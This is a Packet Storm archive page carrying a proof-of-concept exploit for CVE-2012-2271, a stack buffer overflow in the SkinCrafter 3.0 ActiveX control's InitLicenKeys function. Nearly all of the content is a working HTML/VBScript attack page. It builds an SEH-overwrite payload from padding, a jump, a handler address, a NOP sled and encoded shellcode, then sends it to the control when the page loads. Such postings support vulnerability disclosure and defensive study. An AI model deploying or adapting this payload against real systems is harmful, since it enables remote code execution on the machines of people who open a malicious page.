exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SkinCrafter 3.0 Buffer Overflow

SkinCrafter 3.0 Buffer Overflow
Posted May 18, 2012
Authored by Saurabh Sharma

SkinCrafter active-x control version 3.0 suffers from a buffer overflow vulnerability.

tags | exploit, overflow, activex
advisories | CVE-2012-2271
SHA-256 | 30d450dc3599d00c2b250dec0560160d749a900ba9963b7810e0f6b67cf7e422

SkinCrafter 3.0 Buffer Overflow

Change Mirror Download
# Software  : SkinCrafter from NMSoft Technologies
# Version : SkinCrafter version 3.0
# Title : Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
# Link : http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
# Date : May 17, 2012
# Tested on : XP SP2

# The vulnerability lies in the COM component used by the product SkinCrafter
# from DMSoft Technologies(http://www.dmsofttech.com/projects.html). This COM
# component, SkinCrafter3_vs2005.dll, implememnts a function InitLicenKeys,
# whose parameter is not checked for the bounds, hence leading to the
# overflow condition

====
POC:
====

<html>
Exploit !!!!!!!!!!!!!!!!!!!!!!!!!
<object classid='clsid:B9D38E99-5F6E-4C51-8CFD-507804387AE9' id='target' ></object>
<script language='vbscript'>
'Exploit title: Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
'Date: May 17, 2012
'author: Saurabh Sharma(HCL Technologies) sharma_saurabh@hcl.com
'Software Link: http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
'version: SkinCrafter version 3.0
'Tested on : XP SP2
'CVE-2012-2271

targetFile = "C:\Program Files\SkinCrafter3\SkinCrafterDemo\SkinCrafterActiveX\SkinCrafter3_vs2005.dll"
prototype = "Sub InitLicenKeys ( ByVal reg_name As String , ByVal company As String , ByVal email As String , ByVal licenkey As String )"
memberName = "InitLicenKeys"
progid = "SKINCRAFTERLib.SCSkin3"
argCount = 4

shellcode= unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

arg1=String(1084, "A")
nSeh=unescape("%eb%06%90%90")
seh=unescape("%bb%44%06%10")

nops=String(40,unescape("%90"))
arg1=arg1+nSeh+seh+nops+shellcode
arg1=arg1+String(10000, "D")
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"

target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4

</script>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close